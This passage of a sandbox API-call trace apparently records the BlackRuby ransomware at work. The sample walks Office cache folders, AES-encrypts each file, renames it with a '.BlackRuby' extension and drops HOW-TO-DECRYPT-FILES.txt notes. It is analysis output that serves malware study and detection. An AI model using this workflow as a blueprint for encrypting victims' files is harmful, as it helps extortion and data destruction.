ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x36f32e30, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x5b2)) returned 1 [0046.019] GetLastError () returned 0x5 [0046.019] SetErrorMode (uMode=0x0) returned 0x1 [0046.020] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0046.020] GetLastError () returned 0x5 [0046.020] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0046.020] GetLastError () returned 0x5 [0046.020] SetErrorMode (uMode=0x1) returned 0x0 [0046.020] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.020] GetLastError () returned 0x0 [0046.020] GetFileType (hFile=0x184) returned 0x1 [0046.020] SetErrorMode (uMode=0x0) returned 0x1 [0046.020] GetFileType (hFile=0x184) returned 0x1 [0046.020] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x5b2 [0046.020] GetLastError () returned 0x0 [0046.020] ReadFile (in: hFile=0x184, lpBuffer=0x1bb24c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1bb24c8*, lpNumberOfBytesRead=0x18ed18*=0x5b2, lpOverlapped=0x0) returned 1 [0046.021] GetLastError () returned 0x0 [0046.021] CloseHandle (hObject=0x184) returned 1 [0046.021] GetLastError () returned 0x0 [0046.021] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0046.021] GetLastError () returned 0x0 [0046.021] SetErrorMode (uMode=0x1) returned 0x0 [0046.021] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.fr\\proof.xml"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x36f32e30, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x5b2)) returned 1 [0046.022] GetLastError () returned 0x0 [0046.022] SetErrorMode (uMode=0x0) returned 0x1 [0046.022] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c680) returned 1 [0046.022] GetLastError () returned 0x0 [0046.053] CryptImportKey (in: hProv=0x37c680, pbData=0x1c0de64, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360c20) returned 1 [0046.053] GetLastError () returned 0x0 [0046.053] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.053] GetLastError () returned 0x0 [0046.058] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.058] GetLastError () returned 0x0 [0046.058] CryptDuplicateKey (in: hKey=0x360c20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360a20) returned 1 [0046.058] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.058] GetLastError () returned 0x0 [0046.058] CryptSetKeyParam (hKey=0x360a20, dwParam=0x4, pbData=0x1c3aeb0*=0x1, dwFlags=0x0) returned 1 [0046.058] GetLastError () returned 0x0 [0046.058] CryptSetKeyParam (hKey=0x360a20, dwParam=0x1, pbData=0x1c3ae7c, dwFlags=0x0) returned 1 [0046.058] GetLastError () returned 0x0 [0046.058] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c3aef8*, pdwDataLen=0x18ed08*=0x6b0, dwBufLen=0x6b0 | out: pbData=0x1c3aef8*, pdwDataLen=0x18ed08*=0x6b0) returned 1 [0046.059] GetLastError () returned 0x0 [0046.059] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c3bc84*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1c3bc84*, pdwDataLen=0x18ed20*=0x10) returned 1 [0046.059] GetLastError () returned 0x0 [0046.059] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c3bcb4*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1c3bcb4*, pdwDataLen=0x18ed28*=0x10) returned 1 [0046.059] GetLastError () returned 0x0 [0046.059] CryptDestroyKey (hKey=0x360c20) returned 1 [0046.059] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.059] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.059] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0046.059] GetLastError () returned 0x0 [0046.059] SetErrorMode (uMode=0x1) returned 0x0 [0046.059] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.060] GetLastError () returned 0xb7 [0046.060] GetFileType (hFile=0x184) returned 0x1 [0046.060] SetErrorMode (uMode=0x0) returned 0x1 [0046.060] GetFileType (hFile=0x184) returned 0x1 [0046.061] CloseHandle (hObject=0x184) returned 1 [0046.061] GetLastError () returned 0xb7 [0046.061] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0046.061] GetLastError () returned 0xb7 [0046.061] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Encrypted_R2wESXX2ETaIznfXur2JfFCxT7CcXMTuZguXM.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Encrypted_R2wESXX2ETaIznfXur2JfFCxT7CcXMTuZguXM.BlackRuby", lpFilePart=0x0) returned 0x81 [0046.061] GetLastError () returned 0xb7 [0046.061] SetErrorMode (uMode=0x1) returned 0x0 [0046.061] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.fr\\proof.xml"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x23a86dc0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x6c0)) returned 1 [0046.061] GetLastError () returned 0xb7 [0046.061] SetErrorMode (uMode=0x0) returned 0x1 [0046.061] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.fr\\proof.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Encrypted_R2wESXX2ETaIznfXur2JfFCxT7CcXMTuZguXM.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.fr\\encrypted_r2wesxx2etaiznfxur2jffcxt7ccxmtuzguxm.blackruby")) returned 1 [0046.063] GetLastError () returned 0xb7 [0046.063] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x60 [0046.063] GetLastError () returned 0xb7 [0046.063] SetErrorMode (uMode=0x1) returned 0x0 [0046.063] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.fr\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.063] GetLastError () returned 0x5 [0046.064] SetErrorMode (uMode=0x0) returned 0x1 [0046.064] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0046.064] GetLastError () returned 0x5 [0046.064] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.064] GetLastError () returned 0x5 [0046.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.064] GetLastError () returned 0x5 [0046.064] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0046.064] GetLastError () returned 0x5 [0046.064] SetErrorMode (uMode=0x1) returned 0x0 [0046.064] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360c20 [0046.082] GetLastError () returned 0x5 [0046.082] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.082] GetLastError () returned 0x5 [0046.082] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.082] GetLastError () returned 0x5 [0046.082] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.082] GetLastError () returned 0x5 [0046.082] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.082] GetLastError () returned 0x5 [0046.082] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.082] GetLastError () returned 0x5 [0046.082] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0046.082] GetLastError () returned 0x12 [0046.082] FindClose (in: hFindFile=0x360c20 | out: hFindFile=0x360c20) returned 1 [0046.083] SetErrorMode (uMode=0x0) returned 0x1 [0046.083] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0046.083] GetLastError () returned 0x12 [0046.083] SetErrorMode (uMode=0x1) returned 0x0 [0046.083] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360c20 [0046.084] GetLastError () returned 0x12 [0046.084] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.084] GetLastError () returned 0x12 [0046.084] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.084] GetLastError () returned 0x12 [0046.084] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.084] GetLastError () returned 0x12 [0046.084] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.084] GetLastError () returned 0x12 [0046.084] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.084] GetLastError () returned 0x12 [0046.084] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0046.084] GetLastError () returned 0x12 [0046.084] FindClose (in: hFindFile=0x360c20 | out: hFindFile=0x360c20) returned 1 [0046.085] SetErrorMode (uMode=0x0) returned 0x1 [0046.085] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfLR.cab", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfLR.cab", lpFilePart=0x0) returned 0x48 [0046.085] GetLastError () returned 0x12 [0046.085] SetErrorMode (uMode=0x1) returned 0x0 [0046.085] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-0000-0000000ff1ce}-c\\inflr.cab"), fInfoLevelId=0x0, lpFileInformation=0x1c5d128 | out: lpFileInformation=0x1c5d128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x14498400, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x14498400, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x391dd660, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0xefa9cc)) returned 1 [0046.086] GetLastError () returned 0x12 [0046.086] SetErrorMode (uMode=0x0) returned 0x1 [0046.086] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.086] GetLastError () returned 0x12 [0046.086] SetErrorMode (uMode=0x1) returned 0x0 [0046.086] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.087] GetLastError () returned 0x0 [0046.087] GetFileType (hFile=0x184) returned 0x1 [0046.087] SetErrorMode (uMode=0x0) returned 0x1 [0046.087] GetFileType (hFile=0x184) returned 0x1 [0046.087] WriteFile (in: hFile=0x184, lpBuffer=0x1c78dd4*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1c78dd4*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0046.088] GetLastError () returned 0x0 [0046.088] CloseHandle (hObject=0x184) returned 1 [0046.088] GetLastError () returned 0x0 [0046.088] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.088] GetLastError () returned 0x0 [0046.088] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0046.088] GetLastError () returned 0x0 [0046.088] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.msi", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.msi", lpFilePart=0x0) returned 0x4e [0046.088] GetLastError () returned 0x0 [0046.088] SetErrorMode (uMode=0x1) returned 0x0 [0046.088] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-0000-0000000ff1ce}-c\\infopathmui.msi"), fInfoLevelId=0x0, lpFileInformation=0x1c7aae0 | out: lpFileInformation=0x1c7aae0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1dd2ec00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x1dd2ec00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x391b8c70, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x24d400)) returned 1 [0046.088] GetLastError () returned 0x0 [0046.088] SetErrorMode (uMode=0x0) returned 0x1 [0046.089] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.089] GetLastError () returned 0x0 [0046.089] SetErrorMode (uMode=0x1) returned 0x0 [0046.089] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.089] GetLastError () returned 0x5 [0046.090] SetErrorMode (uMode=0x0) returned 0x1 [0046.090] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0046.090] GetLastError () returned 0x5 [0046.091] SetErrorMode (uMode=0x1) returned 0x0 [0046.091] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-0000-0000000ff1ce}-c\\infopathmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x1c98bdc | out: lpFileInformation=0x1c98bdc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x391b8c70, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x4cf)) returned 1 [0046.091] GetLastError () returned 0x5 [0046.091] SetErrorMode (uMode=0x0) returned 0x1 [0046.091] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0046.091] GetLastError () returned 0x5 [0046.091] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0046.091] GetLastError () returned 0x5 [0046.091] SetErrorMode (uMode=0x1) returned 0x0 [0046.091] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-0000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.091] GetLastError () returned 0x0 [0046.091] GetFileType (hFile=0x184) returned 0x1 [0046.091] SetErrorMode (uMode=0x0) returned 0x1 [0046.091] GetFileType (hFile=0x184) returned 0x1 [0046.091] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x4cf [0046.091] GetLastError () returned 0x0 [0046.091] ReadFile (in: hFile=0x184, lpBuffer=0x1c9b0f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c9b0f0*, lpNumberOfBytesRead=0x18ed84*=0x4cf, lpOverlapped=0x0) returned 1 [0046.106] GetLastError () returned 0x0 [0046.106] CloseHandle (hObject=0x184) returned 1 [0046.106] GetLastError () returned 0x0 [0046.106] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0046.106] GetLastError () returned 0x0 [0046.106] SetErrorMode (uMode=0x1) returned 0x0 [0046.106] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-0000-0000000ff1ce}-c\\infopathmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x391b8c70, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x4cf)) returned 1 [0046.106] GetLastError () returned 0x0 [0046.106] SetErrorMode (uMode=0x0) returned 0x1 [0046.106] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c4e8) returned 1 [0046.106] GetLastError () returned 0x0 [0046.140] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1cf69b4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360e60) returned 1 [0046.140] GetLastError () returned 0x0 [0046.140] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.140] GetLastError () returned 0x0 [0046.145] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.145] GetLastError () returned 0x0 [0046.145] CryptDuplicateKey (in: hKey=0x360e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ea0) returned 1 [0046.145] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.145] GetLastError () returned 0x0 [0046.146] CryptSetKeyParam (hKey=0x360ea0, dwParam=0x4, pbData=0x1d23a00*=0x1, dwFlags=0x0) returned 1 [0046.146] GetLastError () returned 0x0 [0046.146] CryptSetKeyParam (hKey=0x360ea0, dwParam=0x1, pbData=0x1d239cc, dwFlags=0x0) returned 1 [0046.146] GetLastError () returned 0x0 [0046.146] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d23a48*, pdwDataLen=0x18ed74*=0x5c0, dwBufLen=0x5c0 | out: pbData=0x1d23a48*, pdwDataLen=0x18ed74*=0x5c0) returned 1 [0046.146] GetLastError () returned 0x0 [0046.146] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d245f4*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1d245f4*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0046.146] GetLastError () returned 0x0 [0046.146] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d24624*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1d24624*, pdwDataLen=0x18ed94*=0x10) returned 1 [0046.146] GetLastError () returned 0x0 [0046.146] CryptDestroyKey (hKey=0x360e60) returned 1 [0046.146] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0046.146] CryptReleaseContext 